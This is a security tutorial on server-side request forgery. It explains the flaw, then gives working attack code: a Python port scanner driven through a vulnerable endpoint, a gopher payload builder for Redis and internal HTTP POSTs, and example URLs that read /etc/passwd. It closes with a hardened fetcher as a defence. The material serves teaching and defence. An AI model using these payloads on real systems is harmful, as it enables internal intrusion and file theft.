1. Vulnerability Description
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker induces the server to issue a request to a target of the attacker's choosing. Because the request originates from the server, it can reach internal systems that the server can connect to but that are not exposed to the external network, which is why those internal systems are the usual target of SSRF attacks.
2. Vulnerability Principle
SSRF vulnerabilities typically arise when:
The server offers a feature that fetches data from another server (a URL preview, an image or document proxy, a webhook, and so on) and neither validates nor restricts the target address.
For example, an attacker supplies a URL pointing at an internal host, and the server fetches that page on the attacker's behalf and returns it, or at least its error behaviour, to the attacker.
3. Exploitation Methods
- Scanning the internal or local network for open ports and collecting banner information from the services listening on them.
- Attacking applications running on the internal or local network, in particular services that trust any connection arriving from the internal network.
- Fingerprinting internal web applications to build an inventory of the organization's internal assets.
- Reading sensitive local files using the file protocol.
4. Protocols Supported by SSRF
1. HTTP Protocol:
Use the HTTP protocol to scan internal ports. Whether a port is open can be inferred from the response time and the length of the returned content: a closed port usually fails immediately with a connection error, while an open port either returns data (a different response length) or, for a service that does not speak HTTP, hangs until the server's timeout.
https://ip/ssrf.php?url=http://127.0.0.1:3389
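The inference above, written out as a small scanner. This is an added example, not code from the original page: it assumes the vulnerable endpoint is the `https://ip/ssrf.php?url=` form shown on the page, probes a reference port that is assumed closed to obtain a baseline, and then classifies every other port by comparing elapsed time, status and body length against that baseline. The `fetch` parameter is pluggable so the decision logic can be exercised without a live target.

```python
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# One probe result: (seconds elapsed, HTTP status returned by ssrf.php or None, body length)
Probe = Tuple[float, Optional[int], int]

# Assumption: the vulnerable endpoint from the page takes the target in ?url=
SSRF_ENDPOINT = "https://ip/ssrf.php?url="


def probe_url(target_ip: str, port: int) -> str:
    """Build the request that makes the server connect to target_ip:port over HTTP."""
    return f"{SSRF_ENDPOINT}http://{target_ip}:{port}"


def timed_fetch(url: str, timeout: float = 5.0) -> Probe:
    """Request the SSRF endpoint and measure how long the server took and how much
    it sent back. HTTP error pages still count as answers; anything else (our own
    timeout, connection reset) counts as no answer."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return (time.monotonic() - start, r.status, len(r.read()))
    except urllib.error.HTTPError as e:
        return (time.monotonic() - start, e.code, len(e.read()))
    except Exception:
        return (time.monotonic() - start, None, 0)


def classify(sample: Probe, baseline: Probe, timeout: float) -> str:
    """Compare one port's probe with the closed-port baseline.
    - the server hung until our timeout: something accepted the TCP connection
      but did not speak HTTP (e.g. RDP on 3389)            -> "timeout"
    - status or length differs from the baseline: the server received data or a
      different error than "connection refused"            -> "open"
    - same status and length as the reference port           -> "closed"
    """
    elapsed, status, length = sample
    _, b_status, b_length = baseline
    if elapsed >= timeout * 0.9:
        return "timeout"
    if status != b_status or length != b_length:
        return "open"
    return "closed"


def scan(target_ip: str, ports, fetch: Callable[[str], Probe] = timed_fetch,
         timeout: float = 5.0, reference_port: int = 1) -> Dict[int, str]:
    """Probe each port through the SSRF endpoint. The reference port is assumed to be
    closed; its response (typically ssrf.php's "connection refused" page) is the
    baseline that every other port is compared against."""
    baseline = fetch(probe_url(target_ip, reference_port))
    return {port: classify(fetch(probe_url(target_ip, port)), baseline, timeout)
            for port in ports}


if __name__ == "__main__":
    # Against a real target this takes a few seconds per port that hangs.
    for port, state in scan("127.0.0.1", [22, 80, 3306, 3389, 6379]).items():
        print(port, state)
```

The length comparison only works if the endpoint echoes something that depends on the outcome (the fetched body, or different error text). When it returns a fixed page regardless of outcome, only the timing channel remains, which is exactly what the consistent-error defence in section 5 is about.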
2. File Protocol:
Read local files using the file protocol. This works only when the server's HTTP client library allows the file scheme (libcurl does unless the application restricts protocols); the file content is returned as if it were a response body.
https://ip/ssrf.php?url=file:///etc/passwd
3. Dict Protocol:
Use the dict protocol to probe service information. curl's dict client sends a few plain-text command lines to the port and returns whatever the service answers, so the response usually contains a banner or error message that identifies the service; the URL path is sent as one of those lines, so a single command can be delivered to a text-based service this way.
https://ip/ssrf.php?url=dict://127.0.0.1:3306
4. Gopher Protocol:
The gopher protocol turns SSRF into a raw TCP primitive: the client takes the URL path after the item-type character, percent-decodes it, writes the bytes to the socket (curl appends a trailing CRLF) and returns the reply. It can therefore probe ports, deliver complete HTTP requests including POST bodies, and speak text-based protocols such as Redis's RESP, which is why attacks on unauthenticated internal Redis instances are the classic gopher SSRF case.
https://ip/ssrf.php?url=gopher://127.0.0.1:3306
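How a gopher payload is assembled, as an added example that is not part of the original page. It encodes a Redis command in RESP and a raw HTTP POST, wraps either in the `gopher://host:port/_<percent-encoded bytes>` form that curl understands (the `_` is the item-type character that curl strips), and also decodes a gopher URL back to the bytes that will hit the wire so a payload can be reviewed before use. The hosts, ports and the `/admin` path are placeholders.

```python
from urllib.parse import quote, unquote_to_bytes


def resp_command(*args: str) -> bytes:
    """Encode one Redis command in RESP, the protocol Redis speaks on port 6379:
    an array header, then each argument as a length-prefixed bulk string."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def http_post(host: str, path: str, body: str) -> bytes:
    """Build a raw HTTP/1.1 POST, something a plain http:// SSRF cannot send
    but gopher can, because the whole request is just bytes on the socket."""
    payload = body.encode()
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode() + payload


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """Wrap raw bytes in a gopher URL. Everything is percent-encoded (safe="")
    so CR, LF, '*', '$' and spaces survive URL parsing; curl drops the leading
    '_' (the gopher item type), percent-decodes the rest, sends it and then
    appends its own CRLF."""
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def gopher_payload(url: str) -> bytes:
    """Inverse of gopher_url: the bytes curl will write to the socket for this URL
    (without the trailing CRLF curl adds), useful for checking a payload."""
    _, _, rest = url.partition("://")
    _, _, path = rest.partition("/")
    return unquote_to_bytes(path[1:])  # skip the item-type character


def ssrf_request(endpoint: str, gopher: str) -> str:
    """Place the gopher URL into the vulnerable endpoint's ?url= parameter.
    It must be encoded a second time, otherwise the server's query-string
    parser decodes %0D%0A into real line breaks before curl ever sees them."""
    return endpoint + quote(gopher, safe="")


if __name__ == "__main__":
    # Assumed targets: Redis on 6379, an internal web app on 8080.
    info = gopher_url("127.0.0.1", 6379, resp_command("INFO"))
    print(info)
    print(ssrf_request("https://ip/ssrf.php?url=", info))
    post = gopher_url("127.0.0.1", 8080, http_post("127.0.0.1", "/admin", "a=1"))
    print(gopher_payload(post).decode())
```

Redis treats every line it receives as a command and ignores ones it does not understand, which is why the stray CRLF curl appends and any HTTP-style junk in front of the payload do not stop the RESP commands from being executed.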
5. Vulnerability Defense
- Disable redirects: the client must not follow 3xx responses, otherwise an allowed external URL can simply redirect to an internal address (for libcurl, leave CURLOPT_FOLLOWLOCATION off).
- Filter the returned information: do not relay the raw response body, status code or error details back to the user; return only what the feature actually needs.
- Disable unnecessary protocols: restrict the client to http and https so that file, dict, gopher and the rest are not reachable at all (for libcurl, CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS).
- Use a URL allowlist: permit only known hosts or domains, then resolve the hostname and check every resulting address against loopback, private, link-local (including the cloud metadata address) and reserved ranges before connecting, and connect to the address that was checked rather than resolving again, so that a DNS rebinding answer cannot slip in between the check and the connection.
- Return consistent error messages: the same generic error, and ideally a similar response time, whether the target was allowed, refused, closed or timed out, so that the port-state inference from section 4 no longer works.
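The defences above combined in one fetcher, as an added example that is not the page's or any library's own code. It assumes a hypothetical allowlist of two hosts, uses only the Python standard library, and makes every failure surface as the same `FetchRejected` error. The resolver is injectable so the address checks can be tested without DNS; `safe_fetch` connects to the validated IP itself and hands that socket to `http.client`, which never follows redirects, so a redirect or a rebinding answer after the check cannot reach an internal host.

```python
import http.client
import ipaddress
import socket
import ssl
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Assumption: the only hosts this feature legitimately needs to fetch from.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
MAX_BODY = 1 << 20                     # never relay more than 1 MiB to the caller
REDIRECTS = {301, 302, 303, 307, 308}  # refused rather than followed


class FetchRejected(Exception):
    """One generic error for every failure, so a caller cannot distinguish
    'host not allowed' from 'connection refused' from 'timed out'."""


def is_public_ip(ip: str) -> bool:
    """Reject loopback, RFC 1918, link-local (169.254.0.0/16, which contains the
    cloud metadata address), multicast, reserved and unspecified addresses.
    IPv4-mapped IPv6 such as ::ffff:127.0.0.1 is unwrapped before the check."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def resolve_all(host: str) -> List[str]:
    """Every A/AAAA answer: all of them must pass, not just the first one."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_target(url: str, resolve: Callable[[str], List[str]] = resolve_all,
                    allowed_hosts=ALLOWED_HOSTS) -> Tuple[str, str, str, int, str]:
    """Return (scheme, host, ip, port, path) for a URL that passes every check."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        port = parts.port or (443 if parts.scheme == "https" else 80)  # .port raises on junk
    except ValueError:
        raise FetchRejected() from None
    if parts.scheme not in ALLOWED_SCHEMES or not host:
        raise FetchRejected()
    if parts.username or parts.password:   # http://example.com@10.0.0.1/ confusion
        raise FetchRejected()
    if host not in allowed_hosts:
        raise FetchRejected()
    ips = resolve(host)
    if not ips or not all(is_public_ip(ip) for ip in ips):
        raise FetchRejected()
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    return parts.scheme, host, ips[0], port, path


def is_allowed_target(url: str, resolve=resolve_all, allowed_hosts=ALLOWED_HOSTS) -> bool:
    try:
        validate_target(url, resolve, allowed_hosts)
        return True
    except FetchRejected:
        return False


def safe_fetch(url: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Fetch over the IP that was validated (no second DNS lookup), never follow
    redirects, cap the body, and hide every failure behind the same exception."""
    scheme, host, ip, port, path = validate_target(url)
    try:
        sock = socket.create_connection((ip, port), timeout=timeout)
        if scheme == "https":
            # The certificate is still verified against the allowlisted hostname.
            sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
            conn = http.client.HTTPSConnection(host, port, timeout=timeout)
        else:
            conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.sock = sock   # http.client only dials when .sock is None, so the checked IP is used
        conn.request("GET", path)
        resp = conn.getresponse()
        if resp.status in REDIRECTS:
            raise FetchRejected()
        body = resp.read(MAX_BODY)
        conn.close()
        return resp.status, body
    except (OSError, http.client.HTTPException):
        raise FetchRejected() from None
```

The request handler that wraps `safe_fetch` should catch `FetchRejected` and answer with one fixed message and status for all cases; the moment it reports "connection refused" versus "timed out", the scanning inference from section 4 works again.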